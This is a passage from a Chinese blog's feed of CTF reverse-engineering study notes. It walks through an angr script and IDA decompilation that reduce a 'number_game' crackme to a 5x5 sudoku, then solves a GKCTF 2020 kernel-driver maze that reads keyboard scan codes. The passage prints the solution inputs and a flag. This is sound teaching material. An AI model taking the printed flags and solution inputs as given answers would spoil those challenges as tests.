obj.stdout.read()</span><br><span class="line">obj.stdout.close()</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">input</span></span><br><span class="line"><span class="built_in">print</span> cmd_out</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> <span class="string">'cxk'</span> <span class="keyword">not</span> <span class="keyword">in</span> cmd_out :</span><br><span class="line"><span class="built_in">print</span> <span class="string">"bingo!!!!!! : "</span>,<span class="built_in">input</span></span><br><span class="line">exit()</span><br></pre></td></tr></table></figure><p>这是网上嫖的<code>wp</code>,貌似效率很高……下来再学习以下这个。继续挖坑……</p><h4 id="angr"><a href="#angr" class="headerlink" title="angr"></a>angr</h4><p><code>md</code>,我第一遍的<code>angr</code>脚本少了一个<code>avoid</code>导致没跑出来,后来瞅瞅树树的才发现……</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> angr</span><br><span class="line">p = angr.Project(<span class="string">"./number_game"</span>,load_options={<span class="string">"auto_load_libs"</span>: <span class="literal">False</span>})</span><br><span class="line">sta = p.factory.entry_state()</span><br><span class="line">sim = p.factory.simulation_manager(sta)</span><br><span class="line">sim.explore(find=<span class="number">0x400AC1</span>,avoid=[<span class="number">0x400AFC</span>,<span class="number">0x4006F4</span>,<span class="number">0x400736</span>,<span class="number">0x4009DF</span>])</span><br><span class="line">print(sim.found[<span class="number">0</span>].posix.dumps(<span class="number">0</span>))</span><br><span class="line"><span class="comment">#b'1134240024\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'</span></span><br></pre></td></tr></table></figure><h4 id="硬刚"><a href="#硬刚" class="headerlink" title="硬刚"></a>硬刚</h4><p>总之爆破交给虚拟机去跑,我们继续分析程序:</p><p>我们就一点一点分析函数(含树……,</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> __int64 __fastcall <span class="title">main</span><span class="params">(<span class="keyword">int</span> a1, <span class="keyword">char</span> **a2, <span class="keyword">char</span> **a3)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">char</span> *v4; <span class="comment">// [rsp+8h] [rbp-38h]</span></span><br><span class="line"> __int64 input; <span class="comment">// [rsp+10h] [rbp-30h] BYREF</span></span><br><span class="line"> __int16 v6; <span class="comment">// [rsp+18h] [rbp-28h]</span></span><br><span class="line"> __int64 v7; <span class="comment">// [rsp+20h] [rbp-20h] BYREF</span></span><br><span class="line"> __int16 v8; <span class="comment">// [rsp+28h] [rbp-18h]</span></span><br><span class="line"> <span class="keyword">char</span> v9; <span class="comment">// [rsp+2Ah] [rbp-16h]</span></span><br><span class="line"> <span class="keyword">unsigned</span> __int64 v10; <span class="comment">// [rsp+38h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line"> v10 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line"> input = <span class="number">0LL</span>;</span><br><span class="line"> v6 = <span class="number">0</span>;</span><br><span class="line"> v7 = <span class="number">0LL</span>;</span><br><span class="line"> v8 = <span class="number">0</span>;</span><br><span class="line"> v9 = <span class="number">0</span>;</span><br><span class="line"> __isoc99_scanf(<span class="string">"%s"</span>, &input);</span><br><span class="line"> <span class="keyword">if</span> ( !(<span class="keyword">unsigned</span> <span class="keyword">int</span>)sub_4006D6((<span class="keyword">const</span> <span class="keyword">char</span> *)&input) )<span class="comment">// 48<= input <=52</span></span><br><span class="line"> {</span><br><span class="line"> v4 = (<span class="keyword">char</span> *)sub_400758((<span class="keyword">char</span> *)&input, <span class="number">0</span>, <span class="number">0xA</span>u);<span class="comment">// 根据输入形成了一个类似链表或者树一样的东西……</span></span><br><span class="line"> sub_400807(v4, (<span class="keyword">int</span> *)&v7); <span class="comment">// 把输入换了一个顺序,存储到dword_601080里面,同时改变了v7,,但是哪里变得没看出来……</span></span><br><span class="line"> v9 = <span class="number">0</span>;</span><br><span class="line"> sub_400881((<span class="keyword">char</span> *)&v7);</span><br><span class="line"> <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span class="keyword">int</span>)sub_400917() )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"TQL!"</span>);</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"flag{"</span>);</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%s"</span>, (<span class="keyword">const</span> <span class="keyword">char</span> *)&input);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"}"</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"your are cxk!!"</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v10;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>那我们能不能这样,我们把校验输入的<code>sub_4006D6</code>给<code>patch</code>掉,然后将<code>0123456789</code>作为输入,反正程序没有修改输入,只是换了一个顺序:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week7/image-20210218114711072.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week7/image-20210218114711072.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210218114711072"></p><p>然后再通过<code>sub_400881</code>函数进行修改<code>sub_601062~sub_601077</code>的值,下来就是看<code>sub_400917</code>的内容,来看看他的判断条件:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0X601060</span> != <span class="number">0X601061</span> <span class="number">0X601065</span> != <span class="number">0X601066</span> <span class="number">0X60106A</span> != <span class="number">0X60106B</span></span><br><span class="line"><span class="number">0X601060</span> != <span class="number">0X601062</span> <span class="number">0X601065</span> != <span class="number">0X601067</span> <span class="number">0X60106A</span> != <span class="number">0X60106C</span></span><br><span class="line"><span class="number">0X601060</span> != <span class="number">0X601063</span> <span class="number">0X601065</span> != <span class="number">0X601068</span> <span class="number">0X60106A</span> != <span class="number">0X60106D</span></span><br><span class="line"><span class="number">0X601060</span> != <span class="number">0X601064</span> <span class="number">0X601065</span> != <span class="number">0X601069</span> <span class="number">0X60106A</span> != <span class="number">0X60106E</span></span><br><span class="line"><span class="number">0X601061</span> != <span class="number">0X601062</span> <span class="number">0X601066</span> != <span class="number">0X601067</span> <span class="number">0X60106B</span> != <span class="number">0X60106C</span></span><br><span class="line"><span class="number">0X601061</span> != <span class="number">0X601063</span> <span class="number">0X601066</span> != <span class="number">0X601068</span> <span class="number">0X60106B</span> != <span class="number">0X60106D</span></span><br><span class="line"><span class="number">0X601061</span> != <span class="number">0X601064</span> <span class="number">0X601066</span> != <span class="number">0X601069</span> <span class="number">0X60106B</span> != <span class="number">0X60106E</span></span><br><span class="line"><span class="number">0X601062</span> != <span class="number">0X601063</span> <span class="number">0X601067</span> != <span class="number">0X601068</span> <span class="number">0X60106C</span> != <span class="number">0X60106D</span></span><br><span class="line"><span class="number">0X601062</span> != <span class="number">0X601064</span> <span class="number">0X601067</span> != <span class="number">0X601069</span> <span class="number">0X60106C</span> != <span class="number">0X60106E</span></span><br><span class="line"><span class="number">0X601063</span> != <span class="number">0X601064</span> <span class="number">0X601068</span> != <span class="number">0X601069</span> <span class="number">0X60106D</span> != <span class="number">0X60106E</span></span><br><span class="line"></span><br><span class="line"><span class="number">0X60106F</span> != <span class="number">0X601070</span> <span class="number">0X601074</span> != <span class="number">0X601075</span> <span class="number">0X601060</span> != <span class="number">0X601065</span></span><br><span class="line"><span class="number">0X60106F</span> != <span class="number">0X601071</span> <span class="number">0X601074</span> != <span class="number">0X601076</span> <span class="number">0X601060</span> != <span class="number">0X60106A</span></span><br><span class="line"><span class="number">0X60106F</span> != <span class="number">0X601072</span> <span class="number">0X601074</span> != <span class="number">0X601077</span> <span class="number">0X601060</span> != <span class="number">0X60106F</span></span><br><span class="line"><span class="number">0X60106F</span> != <span class="number">0X601073</span> <span class="number">0X601074</span> != <span class="number">0X601078</span> <span class="number">0X601060</span> != <span class="number">0X601074</span></span><br><span class="line"><span class="number">0X601070</span> != <span class="number">0X601071</span> <span class="number">0X601075</span> != <span class="number">0X601076</span> <span class="number">0X601065</span> != <span class="number">0X60106A</span></span><br><span class="line"><span class="number">0X601070</span> != <span class="number">0X601072</span> <span class="number">0X601075</span> != <span class="number">0X601077</span> <span class="number">0X601065</span> != <span class="number">0X60106F</span></span><br><span class="line"><span class="number">0X601070</span> != <span class="number">0X601073</span> <span class="number">0X601075</span> != <span class="number">0X601078</span> <span class="number">0X601065</span> != <span class="number">0X601074</span></span><br><span class="line"><span class="number">0X601071</span> != <span class="number">0X601072</span> <span class="number">0X601076</span> != <span class="number">0X601077</span> <span class="number">0X60106A</span> != <span class="number">0X60106F</span></span><br><span class="line"><span class="number">0X601071</span> != <span class="number">0X601073</span> <span class="number">0X601076</span> != <span class="number">0X601078</span> <span class="number">0X60106A</span> != <span class="number">0X601074</span></span><br><span class="line"><span class="number">0X601072</span> != <span class="number">0X601073</span> <span class="number">0X601077</span> != <span class="number">0X601078</span> <span class="number">0X60106F</span> != <span class="number">0X601074</span></span><br><span class="line"></span><br><span class="line"><span class="number">0X601061</span> != <span class="number">0X601066</span> <span class="number">0X601062</span> != <span class="number">0X601067</span> <span class="number">0X601063</span> != <span class="number">0X601068</span></span><br><span class="line"><span class="number">0X601061</span> != <span class="number">0X60106B</span> <span class="number">0X601062</span> != <span class="number">0X60106C</span> <span class="number">0X601063</span> != <span class="number">0X60106D</span></span><br><span class="line"><span class="number">0X601061</span> != <span class="number">0X601070</span> <span class="number">0X601062</span> != <span class="number">0X601071</span> <span class="number">0X601063</span> != <span class="number">0X601072</span></span><br><span class="line"><span class="number">0X601061</span> != <span class="number">0X601075</span> <span class="number">0X601062</span> != <span class="number">0X601076</span> <span class="number">0X601063</span> != <span class="number">0X601077</span></span><br><span class="line"><span class="number">0X601066</span> != <span class="number">0X60106B</span> <span class="number">0X601067</span> != <span class="number">0X60106C</span> <span class="number">0X601068</span> != <span class="number">0X60106D</span></span><br><span class="line"><span class="number">0X601066</span> != <span class="number">0X601070</span> <span class="number">0X601067</span> != <span class="number">0X601071</span> <span class="number">0X601068</span> != <span class="number">0X601072</span></span><br><span class="line"><span class="number">0X601066</span> != <span class="number">0X601075</span> <span class="number">0X601067</span> != <span class="number">0X601076</span> <span class="number">0X601068</span> != <span class="number">0X601077</span></span><br><span class="line"><span class="number">0X60106B</span> != <span class="number">0X601070</span> <span class="number">0X60106C</span> != <span class="number">0X601071</span> <span class="number">0X60106D</span> != <span class="number">0X601072</span></span><br><span class="line"><span class="number">0X60106B</span> != <span class="number">0X601075</span> <span class="number">0X60106C</span> != <span class="number">0X601076</span> <span class="number">0X60106D</span> != <span class="number">0X601077</span></span><br><span class="line"><span class="number">0X601070</span> != <span class="number">0X601075</span> <span class="number">0X601071</span> != <span class="number">0X601076</span> <span class="number">0X601072</span> != <span class="number">0X601077</span></span><br><span class="line"></span><br><span class="line"><span class="number">0X601064</span> != <span class="number">0X601069</span> </span><br><span class="line"><span class="number">0X601064</span> != <span class="number">0X60106E</span></span><br><span class="line"><span class="number">0X601064</span> != <span class="number">0X601073</span></span><br><span class="line"><span class="number">0X601064</span> != <span class="number">0X601078</span></span><br><span class="line"><span class="number">0X601069</span> != <span class="number">0X60106E</span></span><br><span class="line"><span class="number">0X601069</span> != <span class="number">0X601073</span></span><br><span class="line"><span class="number">0X601069</span> != <span class="number">0X601078</span></span><br><span class="line"><span class="number">0X60106E</span> != <span class="number">0X601073</span></span><br><span class="line"><span class="number">0X60106E</span> != <span class="number">0X601078</span></span><br><span class="line"><span class="number">0X601073</span> != <span class="number">0X601078</span></span><br></pre></td></tr></table></figure><p>这里先简述一下他的规律:从<code>0x601060</code>开始到<code>0x601078</code>,每五个分成一组,每组不能有重复的,仅为<code>01234</code>;每一组的第<code>n</code>个数字不能相同;以下受输入影响:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">byte_601062 = a1[<span class="number">0</span>];</span><br><span class="line">byte_601067 = a1[<span class="number">1</span>];</span><br><span class="line">byte_601069 = a1[<span class="number">2</span>];</span><br><span class="line">byte_60106B = a1[<span class="number">3</span>];</span><br><span class="line">byte_60106E = a1[<span class="number">4</span>];</span><br><span class="line">byte_60106F = a1[<span class="number">5</span>];</span><br><span class="line">byte_601071 = a1[<span class="number">6</span>];</span><br><span class="line">byte_601072 = a1[<span class="number">7</span>];</span><br><span class="line">byte_601076 = a1[<span class="number">8</span>];</span><br><span class="line">byte_601077 = a1[<span class="number">9</span>];</span><br></pre></td></tr></table></figure><p>那我们根据规律排除出受输入影响的几个数字应该是多少(有数独内味了~),好吧,就是数独,一个5*5的数独。然后再按照顺序还原成输入:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0x601060</span> = <span class="number">31</span>h ; <span class="number">1</span></span><br><span class="line"><span class="number">0x601061</span> = <span class="number">34</span>h ; <span class="number">4</span></span><br><span class="line"><span class="number">0x601062</span> = a1[<span class="number">0</span>] = <span class="number">30</span>h ; <span class="number">0</span> </span><br><span class="line"><span class="number">0x601063</span> = <span class="number">32</span>h ; <span class="number">2</span></span><br><span class="line"><span class="number">0x601064</span> = <span class="number">33</span>h ; <span class="number">3</span></span><br><span class="line"></span><br><span class="line"><span class="number">0x601065</span> = <span class="number">33</span>h ; <span class="number">3</span></span><br><span class="line"><span class="number">0x601066</span> = <span class="number">30</span>h ; <span class="number">0</span></span><br><span class="line"><span class="number">0x601067</span> = a1[<span class="number">1</span>] = <span class="number">34</span>h ; <span class="number">4</span></span><br><span class="line"><span class="number">0x601068</span> = <span class="number">31</span>h ; <span class="number">1</span></span><br><span class="line"><span class="number">0x601069</span> = a1[<span class="number">2</span>] = <span class="number">32</span>h ; <span class="number">2</span></span><br><span class="line"></span><br><span class="line"><span class="number">0x60106A</span> = <span class="number">30</span>h ; <span class="number">0</span></span><br><span class="line"><span class="number">0x60106B</span> = a1[<span class="number">3</span>] = <span class="number">31</span>h ; <span class="number">1</span></span><br><span class="line"><span class="number">0x60106C</span> = <span class="number">32</span>h ; <span class="number">2</span></span><br><span class="line"><span class="number">0x60106D</span> = <span class="number">33</span>h ; <span class="number">3</span></span><br><span class="line"><span class="number">0x60106E</span> = a1[<span class="number">4</span>] = <span class="number">34</span>h ; <span class="number">4</span></span><br><span class="line"></span><br><span class="line"><span class="number">0x60106F</span> = a1[<span class="number">5</span>] = <span class="number">32</span>h ; <span class="number">2</span></span><br><span class="line"><span class="number">0x601070</span> = <span class="number">33</span>h ; <span class="number">3</span></span><br><span class="line"><span class="number">0x601071</span> = a1[<span class="number">6</span>] = <span class="number">31</span>h ; <span class="number">1</span></span><br><span class="line"><span class="number">0x601072</span> = a1[<span class="number">7</span>] = <span class="number">34</span>h ; <span class="number">4</span></span><br><span class="line"><span class="number">0x601073</span> = <span class="number">30</span>h ; <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="number">0x601074</span> = <span class="number">34</span>h ; <span class="number">4</span></span><br><span class="line"><span class="number">0x601075</span> = <span class="number">32</span>h ; <span class="number">2</span></span><br><span class="line"><span class="number">0x601076</span> = a1[<span class="number">8</span>] = <span class="number">33</span>h ; <span class="number">3</span></span><br><span class="line"><span class="number">0x601077</span> = a1[<span class="number">9</span>] = <span class="number">30</span>h ; <span class="number">0</span></span><br><span class="line"><span class="number">0x601078</span> = <span class="number">31</span>h ; <span class="number">1</span></span><br></pre></td></tr></table></figure><p>再按照<img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week7/image-20210218114711072.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week7/image-20210218114711072.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210218114711072"></p><p>这个顺序还原成输入就好了~</p><h3 id="HITCTF-2020-Node"><a href="#HITCTF-2020-Node" class="headerlink" title="HITCTF 2020 Node"></a>HITCTF 2020 Node</h3><p>好难,先鸽着……</p><h3 id="GKCTF-2020-BabyDriver"><a href="#GKCTF-2020-BabyDriver" class="headerlink" title="GKCTF 2020 BabyDriver"></a>GKCTF 2020 BabyDriver</h3><p><code>DIE,IDA64,F12。</code>怎么像一个<code>maze</code>题……</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">****************</span><br><span class="line">o.*..*......*..*</span><br><span class="line">*.**...**.*.*.**</span><br><span class="line">*.****.**.*.*.**</span><br><span class="line">*...**....*.*.**</span><br><span class="line">***..***.**.*..*</span><br><span class="line">*.**.***.**.**.*</span><br><span class="line">*.**.******.**.*</span><br><span class="line">*.**....***.**.*</span><br><span class="line">*.*****.***....*</span><br><span class="line">*...***.********</span><br><span class="line">**..***......#**</span><br><span class="line">**.*************</span><br><span class="line">****************</span><br></pre></td></tr></table></figure><p>起点和终点明了,主要是上下左右。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">sub_140001380</span><span class="params">(__int64 a1, __int64 a2)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> __int64 v3; <span class="comment">// rdi</span></span><br><span class="line"> __int64 v4; <span class="comment">// rax</span></span><br><span class="line"> <span class="keyword">int</span> v5; <span class="comment">// ecx</span></span><br><span class="line"> __int16 *v6; <span class="comment">// rsi</span></span><br><span class="line"> __int64 v7; <span class="comment">// rbp</span></span><br><span class="line"> __int16 v8; <span class="comment">// dx</span></span><br><span class="line"> <span class="keyword">char</span> v9; <span class="comment">// dl</span></span><br><span class="line"> <span class="keyword">const</span> CHAR *v10; <span class="comment">// rcx</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> ( *(<span class="keyword">int</span> *)(a2 + <span class="number">48</span>) >= <span class="number">0</span> )</span><br><span class="line"> {</span><br><span class="line"> v3 = *(_QWORD *)(a2 + <span class="number">24</span>);</span><br><span class="line"> v4 = *(_QWORD *)(a2 + <span class="number">56</span>) >> <span class="number">3</span>;</span><br><span class="line"> <span class="keyword">if</span> ( (_DWORD)v4 )</span><br><span class="line"> {</span><br><span class="line"> v5 = dword_1400030E4;</span><br><span class="line"> v6 = (__int16 *)(v3 + <span class="number">2</span>);</span><br><span class="line"> v7 = (<span class="keyword">unsigned</span> <span class="keyword">int</span>)v4;</span><br><span class="line"> <span class="keyword">while</span> ( *(_WORD *)(v3 + <span class="number">4</span>) )</span><br><span class="line"> {</span><br><span class="line">LABEL_28:</span><br><span class="line"> v6 += <span class="number">6</span>;</span><br><span class="line"> <span class="keyword">if</span> ( !--v7 )</span><br><span class="line"> <span class="keyword">goto</span> LABEL_29;</span><br><span class="line"> }</span><br><span class="line"> aO[v5] = <span class="string">'.'</span>;</span><br><span class="line"> v8 = *v6;</span><br><span class="line"> <span class="keyword">if</span> ( *v6 == <span class="number">23</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( (v5 & <span class="number">0xFFFFFFF0</span>) != <span class="number">0</span> )</span><br><span class="line"> {</span><br><span class="line"> v5 -= <span class="number">16</span>;</span><br><span class="line"> <span class="keyword">goto</span> LABEL_21;</span><br><span class="line"> }</span><br><span class="line"> v5 += <span class="number">208</span>;</span><br><span class="line"> dword_1400030E4 = v5;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( v8 == <span class="number">37</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( (v5 & <span class="number">0xFFFFFFF0</span>) != <span class="number">208</span> )</span><br><span class="line"> {</span><br><span class="line"> v5 += <span class="number">16</span>;</span><br><span class="line"> <span class="keyword">goto</span> LABEL_21;</span><br><span class="line"> }</span><br><span class="line"> v5 -= <span class="number">208</span>;</span><br><span class="line"> dword_1400030E4 = v5;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( v8 == <span class="number">36</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( (v5 & <span class="number">0xF</span>) != <span class="number">0</span> )</span><br><span class="line"> {</span><br><span class="line"> --v5;</span><br><span class="line"> <span class="keyword">goto</span> LABEL_21;</span><br><span class="line"> }</span><br><span class="line"> v5 += <span class="number">15</span>;</span><br><span class="line"> dword_1400030E4 = v5;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( v8 != <span class="number">38</span> )</span><br><span class="line"> <span class="keyword">goto</span> LABEL_22;</span><br><span class="line"> <span class="keyword">if</span> ( (v5 & <span class="number">0xF</span>) == <span class="number">15</span> )</span><br><span class="line"> v5 -= <span class="number">15</span>;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> ++v5;</span><br><span class="line">LABEL_21:</span><br><span class="line"> dword_1400030E4 = v5;</span><br><span class="line">LABEL_22:</span><br><span class="line"> v9 = aO[v5];</span><br><span class="line"> <span class="keyword">if</span> ( v9 == <span class="string">'*'</span> )</span><br><span class="line"> {</span><br><span class="line"> v10 = <span class="string">"failed!\n"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( v9 != <span class="string">'#'</span> )</span><br><span class="line"> {</span><br><span class="line">LABEL_27:</span><br><span class="line"> aO[v5] = <span class="number">111</span>;</span><br><span class="line"> <span class="keyword">goto</span> LABEL_28;</span><br><span class="line"> }</span><br><span class="line"> v10 = <span class="string">"success! flag is flag{md5(input)}\n"</span>;</span><br><span class="line"> }</span><br><span class="line"> dword_1400030E4 = <span class="number">16</span>;</span><br><span class="line"> DbgPrint(v10);</span><br><span class="line"> v5 = dword_1400030E4;</span><br><span class="line"> <span class="keyword">goto</span> LABEL_27;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">LABEL_29:</span><br><span class="line"> <span class="keyword">if</span> ( *(_BYTE *)(a2 + <span class="number">65</span>) )</span><br><span class="line"> *(_BYTE *)(*(_QWORD *)(a2 + <span class="number">184</span>) + <span class="number">3</span>i64) |= <span class="number">1u</span>;</span><br><span class="line"> <span class="keyword">return</span> *(<span class="keyword">unsigned</span> <span class="keyword">int</span> *)(a2 + <span class="number">48</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>其实很容易看出来哪些分支是上下左右,,,但是<code>23,36,37,38</code>明显不是常规的ASCII。上网查了一波才知道是键盘扫描码,对应着<code>ijkl</code>手动走一下迷宫:</p><blockquote><p><code>LKKKLLKLKKKLLLKKKLLLLLL</code></p><p><code>flag{403950a6f64f7fc4b655dea696997851}</code></p></blockquote>]]></content>
<categories>
<category> CTF学习笔记 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>Re学习之RX引路_week6</title>
<link href="2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/"/>
<url>2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/</url>
